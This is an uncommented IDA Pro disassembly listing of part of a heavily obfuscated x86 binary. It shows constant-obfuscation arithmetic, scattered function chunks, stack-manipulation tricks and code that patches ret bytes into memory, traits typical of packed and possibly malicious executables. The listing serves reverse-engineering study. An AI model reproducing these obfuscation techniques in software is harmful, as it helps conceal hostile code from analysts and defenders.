loc_4522B5:				; CODE XREF: sub_44D298:loc_45165Ej
		xor	eax, 0A91D3DCAh
		add	eax, ebp
		push	edx
		push	5A780F3Fh
		pop	edx
		jmp	loc_459965
; END OF FUNCTION CHUNK	FOR sub_44D298
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_4522C9:				; CODE XREF: sub_45A323:loc_453B54j
		jz	loc_43DC0D
		jmp	loc_451879
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4530DF

loc_4522D4:				; CODE XREF: sub_4530DF-1609Dj
		call	sub_4586B3
; END OF FUNCTION CHUNK	FOR sub_4530DF
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_4522D9:				; CODE XREF: sub_446E24:loc_453232j
		test	eax, eax
		jz	loc_453900
		jmp	loc_454FD8
; END OF FUNCTION CHUNK	FOR sub_446E24

; =============== S U B	R O U T	I N E =======================================



sub_4522E6	proc near		; DATA XREF: k2vbe3.d:00454417o
		push	0BD79CFF6h
		pop	eax
		or	eax, 0D15D2D89h
		add	eax, 0D6C8AC1Ch
		push	offset sub_4561C3
		jmp	nullsub_538
sub_4522E6	endp

; ---------------------------------------------------------------------------
		push	74DFD80Ch
		pop	eax
		xor	eax, 36D68AC1h
		sub	eax, 0F7656961h
		jmp	loc_452633
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_456. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4504F3

loc_45231A:				; CODE XREF: sub_4504F3-4EFFj
		jmp	sub_451759
; END OF FUNCTION CHUNK	FOR sub_4504F3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A79B

loc_45231F:				; CODE XREF: sub_44A79B-2AE0j
		jmp	loc_44CE07
; END OF FUNCTION CHUNK	FOR sub_44A79B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE0A

loc_452324:				; CODE XREF: sub_43FE0A:loc_44BD9Bj
		mov	eax, [ebp-8]
		shr	eax, 0Bh
		jmp	loc_441FE1
; ---------------------------------------------------------------------------

loc_45232F:				; CODE XREF: sub_43FE0A:loc_452A51j
		mov	eax, [ebp-0Ch]
		cmp	byte ptr [eax],	0
		jnz	loc_45C258
		jmp	loc_441E4C
; END OF FUNCTION CHUNK	FOR sub_43FE0A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C04E

loc_452340:				; CODE XREF: sub_43C04E:loc_44C7E3j
		call	edx
		xor	eax, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_43C04E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C745

loc_452345:				; CODE XREF: sub_43C745+16DAFj
		jmp	loc_45A104
; END OF FUNCTION CHUNK	FOR sub_43C745
; ---------------------------------------------------------------------------

loc_45234A:				; CODE XREF: k2vbe3.d:0043D68Cj
		jmp	loc_4593B7

; =============== S U B	R O U T	I N E =======================================



sub_45234F	proc near		; CODE XREF: sub_4426DF:loc_450E5Ap
					; k2vbe3.d:00458762p

; FUNCTION CHUNK AT 0043EE2F SIZE 00000016 BYTES

		push	edi
		push	0A5C71B1Fh
		pop	edi
		sub	edi, 7677923Ah
		jmp	loc_43EE2F
sub_45234F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_452361:				; CODE XREF: sub_440C94-36EEj
		jz	loc_44A89F
		jmp	loc_4565E9
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448512

loc_45236C:				; CODE XREF: sub_448512+16j
		jl	loc_450922

loc_452372:				; CODE XREF: sub_43D244+1DC26j
		jmp	nullsub_416
; END OF FUNCTION CHUNK	FOR sub_448512
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_452377:				; CODE XREF: sub_4424CF+176C8j
		jmp	loc_444077
; END OF FUNCTION CHUNK	FOR sub_4424CF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4544C3

loc_45237C:				; CODE XREF: sub_4544C3-B15j
		jmp	loc_4510FD
; END OF FUNCTION CHUNK	FOR sub_4544C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454AD4

loc_452381:				; CODE XREF: sub_454AD4-9FE2j
		sbb	eax, 10ACF453h
		jmp	loc_45091C
; END OF FUNCTION CHUNK	FOR sub_454AD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4545C4

loc_45238C:				; CODE XREF: sub_4545C4:loc_459585j
		mov	byte ptr [eax],	0C3h
		jmp	loc_458AC4
; ---------------------------------------------------------------------------

loc_452394:				; CODE XREF: sub_4545C4j
		xchg	ecx, [esp+4+var_4]
		mov	edx, ecx
		pop	ecx
		mov	eax, [esp+0]
		push	edx
		jmp	loc_443F75
; END OF FUNCTION CHUNK	FOR sub_4545C4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4475D5

loc_4523A3:				; CODE XREF: sub_4475D5:loc_4475E9j
		and	edx, 33723698h
		add	edx, 0BA7E3830h
		call	sub_45B20A
		push	eax
		ror	eax, 5
		push	esi
		jmp	loc_44A133
; END OF FUNCTION CHUNK	FOR sub_4475D5

; =============== S U B	R O U T	I N E =======================================



sub_4523BE	proc near		; DATA XREF: sub_4570C0:loc_442291o

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043D72C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00440A12 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00447604 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00447789 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044831D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BA6B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045303F SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004557E8 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00458DDD SIZE 00000015 BYTES

		add	eax, edx
		pop	edx
		xor	eax, 0EE1851A2h
		ror	eax, 9
		xor	eax, 0FB13936Bh
		add	eax, 540A3F51h
		ror	eax, 8
		push	ecx
		jmp	loc_44BA6B
sub_4523BE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		adc	esi, ebp
		jmp	sub_43F34C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_4523E6:				; CODE XREF: sub_440C94:loc_45A599j
		jz	loc_448E0A
		jmp	loc_44F1D9
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44128B

loc_4523F1:				; CODE XREF: sub_44128B-17CEj
		jz	loc_453667

loc_4523F7:				; CODE XREF: sub_452B1A+Cj
		jmp	loc_43C0A5
; END OF FUNCTION CHUNK	FOR sub_44128B
; ---------------------------------------------------------------------------
		sbb	edi, esi
		not	ecx
		jmp	loc_453667
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441409

loc_452405:				; CODE XREF: sub_441409+Aj
		push	edx
		push	ebx
		push	0C2DE3075h
		pop	ebx
		add	ebx, 0CC49258Ah
		sub	ebx, 0E4F9D470h
		add	ebx, 0F0CA3993h
		and	ebx, 0F4F56BFCh
		jmp	loc_43D7D3
; END OF FUNCTION CHUNK	FOR sub_441409
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448472

loc_45242A:				; CODE XREF: sub_448472:loc_442153j
		add	edi, 0BF6C62DAh
		xchg	edi, [esp+0]
		jmp	loc_455240
; END OF FUNCTION CHUNK	FOR sub_448472
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_452438:				; CODE XREF: sub_45A323-5B32j
		mov	ebp, edx
		jo	loc_44F735

loc_452440:				; CODE XREF: sub_45A323:loc_44A70Bj
		call	nullsub_1
		jmp	loc_441921
; END OF FUNCTION CHUNK	FOR sub_45A323

; =============== S U B	R O U T	I N E =======================================



sub_45244A	proc near		; CODE XREF: sub_44249A:loc_44249Dj

; FUNCTION CHUNK AT 0043F2B2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442946 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004468CE SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044F33F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004524B8 SIZE 0000001A BYTES

		add	esp, 0FFFFFED0h
		mov	[ebp-0Ch], ecx
		mov	[ebp-6], dx
		push	esi
		jmp	loc_43F2B2
sub_45244A	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44471B

loc_45245D:				; CODE XREF: sub_44471B:loc_457C28j
		pop	edx
		mov	eax, [eax]
		push	edi
		push	8326ED3Ch
		pop	edi
		or	edi, 0DF50B359h
		jmp	loc_45BF1D
; END OF FUNCTION CHUNK	FOR sub_44471B
; ---------------------------------------------------------------------------
		mov	ecx, eax
		test	esi, ebx
		jmp	loc_45BEFB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_259. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E0F6

loc_45247C:				; CODE XREF: sub_44E0F6+5B7Ej
		jz	loc_43FC34
		jmp	loc_43E6A7
; END OF FUNCTION CHUNK	FOR sub_44E0F6
; ---------------------------------------------------------------------------
		push	edx
		push	3597A697h
		pop	edx
		rol	edx, 1
		or	edx, 0A4DA7EBDh
		rol	edx, 9
		jmp	loc_4581D7
; ---------------------------------------------------------------------------

loc_45249E:				; DATA XREF: sub_4566DA+Ao
		push	99A9CB37h
		pop	eax
		or	eax, ds:4000EFh
		sub	eax, 24699BACh
		rol	eax, 3
		jmp	loc_448301
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45244A

loc_4524B8:				; CODE XREF: sub_45244A:loc_43F2B2j
		push	9B46877Dh
		pop	esi
		xor	esi, 4DC6E1F4h
		rol	esi, 13h
		xor	esi, 0FAD3FCF7h
		jmp	loc_4468CE
; END OF FUNCTION CHUNK	FOR sub_45244A

; =============== S U B	R O U T	I N E =======================================



sub_4524D2	proc near		; CODE XREF: sub_4402EF+C0A0p
					; k2vbe3.d:0044FAFEj

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004424D8 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00443432 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444746 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004489FA SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044EE61 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0044FD18 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454DBA SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045BB30 SIZE 0000001D BYTES

		xchg	esi, [esp+0]
		pop	esi
		xor	edx, edx
		push	edx
		jmp	loc_45BB30
sub_4524D2	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4524DE	proc near		; CODE XREF: k2vbe3.d:0044B08Fj
					; sub_4590BA-6EB4p
		xchg	esi, [esp+0]
		pop	esi
		mov	ds:off_41E1F0, eax
		push	offset loc_443C32
		jmp	nullsub_126
sub_4524DE	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_4524F2:				; CODE XREF: sub_457D4B-E48Fj
		add	eax, 4E0899A7h
		call	sub_451759
		xor	eax, 930B1649h
		rol	eax, 11h

loc_452506:				; CODE XREF: k2vbe3.d:0044354Fj
		xor	eax, 0D12F1DA7h
		rol	eax, 16h
		jmp	loc_4563F8
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C1C5

loc_452514:				; CODE XREF: sub_43C1C5:loc_459A2Fj
		push	10h
		mov	eax, [ebp-8]
		push	eax
		call	sub_43CC89
		jmp	loc_456300
; END OF FUNCTION CHUNK	FOR sub_43C1C5
; ---------------------------------------------------------------------------
		mov	eax, 0D504D785h
		call	sub_4553CC
		push	esi
; START	OF FUNCTION CHUNK FOR sub_451EEA

loc_45252F:				; CODE XREF: sub_451EEA:loc_44AD58j
		push	1CC292B2h
		pop	esi
		xor	esi, 1572783Dh
		or	esi, 0BB3E6052h
		add	esi, 4482F59Dh
		jmp	loc_450F14
; END OF FUNCTION CHUNK	FOR sub_451EEA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BD87

loc_45254C:				; CODE XREF: sub_45BD87+Bj
		add	ecx, 18CA1CC6h
		or	ecx, 1C804952h
		add	ecx, 7487A843h
		call	sub_451214
; END OF FUNCTION CHUNK	FOR sub_45BD87
; START	OF FUNCTION CHUNK FOR sub_4423D2

loc_452563:				; CODE XREF: sub_4423D2-5B2Ej
		jmp	loc_43EBEC
; END OF FUNCTION CHUNK	FOR sub_4423D2
; ---------------------------------------------------------------------------

loc_452568:				; CODE XREF: k2vbe3.d:loc_44C858j
		jnz	loc_446062
		jmp	loc_44D70B
; ---------------------------------------------------------------------------

loc_452573:				; DATA XREF: sub_448218+12o
		mov	[ecx], eax
		pop	ecx
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_452576:				; CODE XREF: k2vbe3.d:00447FFCj
					; sub_4467A1+156CFj
		jns	loc_456EEF
		cmp	dword ptr [ebp-4], 0
; END OF FUNCTION CHUNK	FOR sub_4467A1
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_452580:				; CODE XREF: sub_44D0D5:loc_4419E2j
		jnz	loc_44C27C
		jmp	loc_44E108
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_45258B:				; CODE XREF: sub_457D4B-147EFj
		jnz	loc_4489A8
		jmp	loc_450FE7
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4432B0

loc_452596:				; CODE XREF: sub_4432B0+1537Dj
		and	edx, 0D3ABE3DDh
		jns	loc_4510C9

loc_4525A2:				; CODE XREF: sub_444B3E-49DAj
		jmp	loc_45A531
; END OF FUNCTION CHUNK	FOR sub_4432B0
; ---------------------------------------------------------------------------

loc_4525A7:				; CODE XREF: k2vbe3.d:0043D781j
		jmp	sub_45B20A
; ---------------------------------------------------------------------------
		shl	eax, 1Fh
		shr	ebp, 0Dh
		jnz	loc_45BD0E
		jmp	loc_4510C9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D31B

loc_4525BD:				; CODE XREF: sub_43D31B:loc_44BC46j
					; sub_43D31B+E937j
		add	esi, 0EE41CFA6h
		test	esi, 4
		jmp	loc_4506E3
; END OF FUNCTION CHUNK	FOR sub_43D31B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_4525CE:				; CODE XREF: sub_43CCD0+56A3j
		add	eax, ebp
		add	eax, 110DFF8Ah
		mov	eax, [eax]
		mov	eax, [eax]

loc_4525DA:				; CODE XREF: sub_451EEA-6F58j
		and	eax, 0FFFFFFh
		jmp	loc_440A02
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440F92

loc_4525E4:				; CODE XREF: sub_440F92:loc_45A8F6j
		sub	edi, 0EB890A26h
		add	edi, 0EAA6C846h
		call	sub_43DF1A

loc_4525F5:				; CODE XREF: k2vbe3.d:loc_43D4E4j
		and	esi, ebp
		and	ecx, 68EF821Dh
		jmp	loc_43F7A0
; END OF FUNCTION CHUNK	FOR sub_440F92
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4506C3

loc_452602:				; CODE XREF: sub_4506C3-134DAj
		jg	loc_446572
		jg	loc_43E290
		jge	loc_44F72C
		or	ebx, ebp
		jmp	loc_444349
; END OF FUNCTION CHUNK	FOR sub_4506C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C041

loc_45261B:				; CODE XREF: sub_45C041+12j
		mov	[edi], eax
		pop	edi
		mov	eax, [ebp-4]
		mov	al, [eax]
		jns	loc_442731
		sub	al, 99h
		mov	edx, [ebp-4]
		jmp	loc_451A57
; END OF FUNCTION CHUNK	FOR sub_45C041
; ---------------------------------------------------------------------------

loc_452633:				; CODE XREF: k2vbe3.d:00452314j
		and	eax, 36B7DCCDh
		xor	eax, 3CCA6B8Eh
		push	esi
		pushf
		jmp	loc_44E017
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_36. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_452647:				; CODE XREF: sub_4467A1+D29Fj
		jmp	loc_45BE69
; END OF FUNCTION CHUNK	FOR sub_4467A1
; ---------------------------------------------------------------------------

loc_45264C:				; CODE XREF: k2vbe3.d:0044E71Cj
		jmp	loc_43F306
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444D7B

loc_452651:				; CODE XREF: sub_444D7B+182Fj
		jmp	loc_43D1A2
; END OF FUNCTION CHUNK	FOR sub_444D7B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B0F

loc_452656:				; CODE XREF: sub_455B0F+12j
		jmp	nullsub_195
; END OF FUNCTION CHUNK	FOR sub_455B0F
; ---------------------------------------------------------------------------
		push	70E57A65h
		pop	eax
		and	eax, 7F52215Eh
		or	eax, ds:4000F3h
		add	eax, 23ACEC36h
		jmp	loc_444316
; ---------------------------------------------------------------------------
		push	ebx
		push	offset loc_44C63B
		jmp	loc_448596
; ---------------------------------------------------------------------------

locret_452683:				; CODE XREF: k2vbe3.d:loc_43E9DAj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BDF

loc_452684:				; CODE XREF: sub_443BDF-2528j
		add	esi, edi
		jns	loc_45BF06
		sbb	eax, ebp
		jmp	loc_44C529
; END OF FUNCTION CHUNK	FOR sub_443BDF

; =============== S U B	R O U T	I N E =======================================



sub_452693	proc near		; CODE XREF: k2vbe3.d:0045817Cj
					; sub_458DAF:loc_45BD33p

; FUNCTION CHUNK AT 0043E588 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00440815 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004581A5 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	6C624745h
		pop	edx
		jmp	loc_4581A5
sub_452693	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_190. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4526A3:				; CODE XREF: k2vbe3.d:0043E7E1j
		adc	esi, ebp
		jge	loc_44023D
; START	OF FUNCTION CHUNK FOR sub_448A7D

loc_4526AB:				; CODE XREF: sub_448A7D:loc_44F3DCj
		xor	edx, 148938AAh
		call	sub_45B20A
		push	ebp
		jmp	loc_4584C9
; END OF FUNCTION CHUNK	FOR sub_448A7D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445593

loc_4526BC:				; CODE XREF: sub_445593-813Fj
		pop	ebx
		or	ebx, 61B6D8F3h
		rol	ebx, 10h
		add	ebx, 2145D261h
		popf
		jmp	loc_4562A8
; END OF FUNCTION CHUNK	FOR sub_445593
; ---------------------------------------------------------------------------

loc_4526D2:				; CODE XREF: k2vbe3.d:loc_4531AEj
		mov	byte ptr [eax],	0C3h
		jmp	loc_43E7F6

; =============== S U B	R O U T	I N E =======================================



sub_4526DA	proc near		; CODE XREF: sub_4191D2+31Ep
					; sub_4526DA+5j
					; DATA XREF: ...
		call	sub_4526F4
		jmp	ds:off_41E070
sub_4526DA	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448343

loc_4526E5:				; CODE XREF: sub_448343:loc_45322Dj
		jmp	loc_45494B
; END OF FUNCTION CHUNK	FOR sub_448343
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4517AE

loc_4526EA:				; CODE XREF: sub_4517AE+Fj
		jmp	loc_44E089
; END OF FUNCTION CHUNK	FOR sub_4517AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448159

loc_4526EF:				; CODE XREF: sub_448159+9j
		jmp	loc_441D60
; END OF FUNCTION CHUNK	FOR sub_448159

; =============== S U B	R O U T	I N E =======================================



sub_4526F4	proc near		; CODE XREF: sub_43E026+7j sub_4526DAp ...

; FUNCTION CHUNK AT 0043E032 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00444FC8 SIZE 00000005 BYTES

		jnb	loc_43E032

loc_4526FA:				; CODE XREF: k2vbe3.d:0044B21Ej
		pop	edx

loc_4526FB:				; CODE XREF: k2vbe3.d:004476E3j
		push	offset loc_452D87
		jmp	nullsub_129
sub_4526F4	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442C22

loc_452705:				; CODE XREF: sub_442C22+B837j
		rol	edx, 1Ah
		sub	edx, 0F75B6022h
		add	edx, 7BFB3522h
		call	sub_45A6B1
; END OF FUNCTION CHUNK	FOR sub_442C22

; =============== S U B	R O U T	I N E =======================================



sub_452719	proc near		; CODE XREF: k2vbe3.d:0043FEC5j
					; sub_459347+2C58p

arg_0		= dword	ptr  4

		xchg	esi, [esp+0]
		pop	esi
		xchg	ecx, [esp-4+arg_0]
		mov	eax, ecx
		pop	ecx
		pop	ebp
		jmp	loc_450E2C
sub_452719	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_452729:				; CODE XREF: k2vbe3.d:0044A529j
		and	eax, ecx
		jmp	loc_4405D4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_211. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B8EF

loc_452731:				; CODE XREF: sub_44B8EF+D9D2j
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_44B8EF
; ---------------------------------------------------------------------------

loc_452736:				; CODE XREF: k2vbe3.d:loc_457E8Cj
		jge	loc_43F37E

loc_45273C:				; CODE XREF: k2vbe3.d:00451241j
		jmp	loc_459083
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_452741:				; CODE XREF: sub_45A323-1AB0Dj
		jmp	sub_451759
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
		shl	edi, 4
		ja	loc_442495
		xor	ebx, ecx
		sub	eax, 4A6C019Ah
		adc	edx, 73B65A43h
		jmp	loc_43F37E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_452762:				; CODE XREF: sub_44C90E-106A9j
					; sub_44C90E:loc_457345j
		cmp	dword ptr [ebp-108h], 436E6F4Dh
		jnz	loc_44A72E
		jmp	loc_44C616
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FECA

loc_452777:				; CODE XREF: sub_43FECA:loc_441F12j
		sub	ebp, 9933A5E5h
		jz	loc_45C144
		xchg	ebx, ebp
		and	edi, 0A85C93D5h
		pop	esi
		jmp	loc_4568A5
; END OF FUNCTION CHUNK	FOR sub_43FECA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443A30

loc_452791:				; CODE XREF: sub_443A30+6A8Aj
		jz	loc_44C7F8
		jmp	loc_44A659
; END OF FUNCTION CHUNK	FOR sub_443A30
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_45279C:				; CODE XREF: k2vbe3.d:loc_44424Bj
					; sub_44921C+6Dj
		jl	loc_45B290
		mov	edx, 0FF6FC142h
		push	7C20D092h
		jmp	loc_442915
; END OF FUNCTION CHUNK	FOR sub_44921C
; ---------------------------------------------------------------------------

loc_4527B1:				; CODE XREF: k2vbe3.d:0044DD2Cj
		jnp	loc_44A67C
		jns	loc_43CB83
		jmp	loc_44C3D8

; =============== S U B	R O U T	I N E =======================================



sub_4527C2	proc near		; CODE XREF: sub_4521CB+6j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043DF50 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045B11D SIZE 00000005 BYTES

		add	esp, 0FFFFFFF0h
		push	ebx
		jmp	loc_45B11D
sub_4527C2	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4527CB	proc near		; CODE XREF: k2vbe3.d:0044DBB2j
					; k2vbe3.d:00451F13p
		xchg	eax, [esp+0]
		pop	eax
		call	sub_44ADEC
		jmp	loc_459233
sub_4527CB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------

loc_4527DA:				; CODE XREF: k2vbe3.d:0044F592j
		call	sub_43C04E
		test	al, al
		jz	loc_43C38C
		jmp	loc_450562
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444D7B

loc_4527EC:				; CODE XREF: sub_444D7B+13424j
		cdq
		sub	esi, ecx
		jmp	loc_449634
; END OF FUNCTION CHUNK	FOR sub_444D7B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D85C

loc_4527F4:				; CODE XREF: sub_43D85C+Aj
		pop	ecx
		rol	ecx, 19h
		and	ecx, 56E255C1h
		add	ecx, 0ADFDEF7Fh
		xchg	ecx, [esp+0]
		mov	eax, [ebp-10h]
		jmp	loc_4595DE
; END OF FUNCTION CHUNK	FOR sub_43D85C
; ---------------------------------------------------------------------------

loc_45280F:				; CODE XREF: k2vbe3.d:00449EEDj
		or	[ecx+edx], al
		push	0CBA3DC53h
		jmp	loc_453B94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440D7B

loc_45281C:				; CODE XREF: sub_440D7B:loc_4569F4j
		jz	loc_4544EC
		jmp	loc_45AFD4
; END OF FUNCTION CHUNK	FOR sub_440D7B
; ---------------------------------------------------------------------------

loc_452827:				; CODE XREF: k2vbe3.d:0043D9ECj
		jb	loc_44BA48

; =============== S U B	R O U T	I N E =======================================



sub_45282D	proc near		; CODE XREF: k2vbe3.d:00459A10p

; FUNCTION CHUNK AT 0043ED6C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441F50 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044B133 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00452E49 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453B61 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00456780 SIZE 00000013 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	4E6E429Eh
		pop	edi
		or	edi, 2739E58Ch
		rol	edi, 13h
		jb	loc_456780

loc_452846:				; CODE XREF: k2vbe3.d:00457EBBj
		jmp	loc_452E49
sub_45282D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448834

loc_45284B:				; CODE XREF: sub_448834+7j
		jmp	loc_446A28
; END OF FUNCTION CHUNK	FOR sub_448834
; ---------------------------------------------------------------------------

loc_452850:				; CODE XREF: k2vbe3.d:00443AC8j
		jmp	loc_43D9AF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D59D

loc_452855:				; CODE XREF: sub_44D59D-87C5j
		ja	loc_445E5E

loc_45285B:				; CODE XREF: sub_44D59D:loc_453B29j
		call	sub_45AA57
		push	59C1D245h
		pop	edx
		add	edx, 0AEB27B2h
		xor	edx, 5F7E15ABh
		jmp	sub_4462E0
; END OF FUNCTION CHUNK	FOR sub_44D59D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_452877:				; CODE XREF: sub_44C90E-955Dj
		xor	edx, 740CA606h
		add	eax, edx
		pop	edx
		mov	eax, [eax]
		push	eax
		call	sub_43E282

loc_452888:				; CODE XREF: sub_44C90E-2E03j
		mov	eax, 0B1h
		jmp	loc_459FD2
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_452892:				; CODE XREF: k2vbe3.d:loc_44BB45j
					; sub_45A323-2DBDj
		jz	loc_453026
		jmp	loc_457D6C
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_45289D:				; CODE XREF: sub_44B94B:loc_4465FAj
		cmp	dword ptr [ebp-4], 6
		jnz	loc_43EF2E
		jmp	loc_44041A
; END OF FUNCTION CHUNK	FOR sub_44B94B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_491. PRESS KEYPAD	"+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_519. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		test	ebx, edx
		adc	edi, edi
		call	fword ptr [edx-75h]
		add	al, 24h
		push	edx
		jmp	loc_43C0E3
; ---------------------------------------------------------------------------

loc_4528BD:				; CODE XREF: k2vbe3.d:00456F43j
		mov	ecx, [edx]
		not	edi
; START	OF FUNCTION CHUNK FOR sub_44D298

loc_4528C1:				; CODE XREF: sub_44D298:loc_456F2Bj
		or	eax, 0C12FB76Ch
		rol	eax, 6
		and	eax, 0D5F73295h
		jmp	loc_45165E
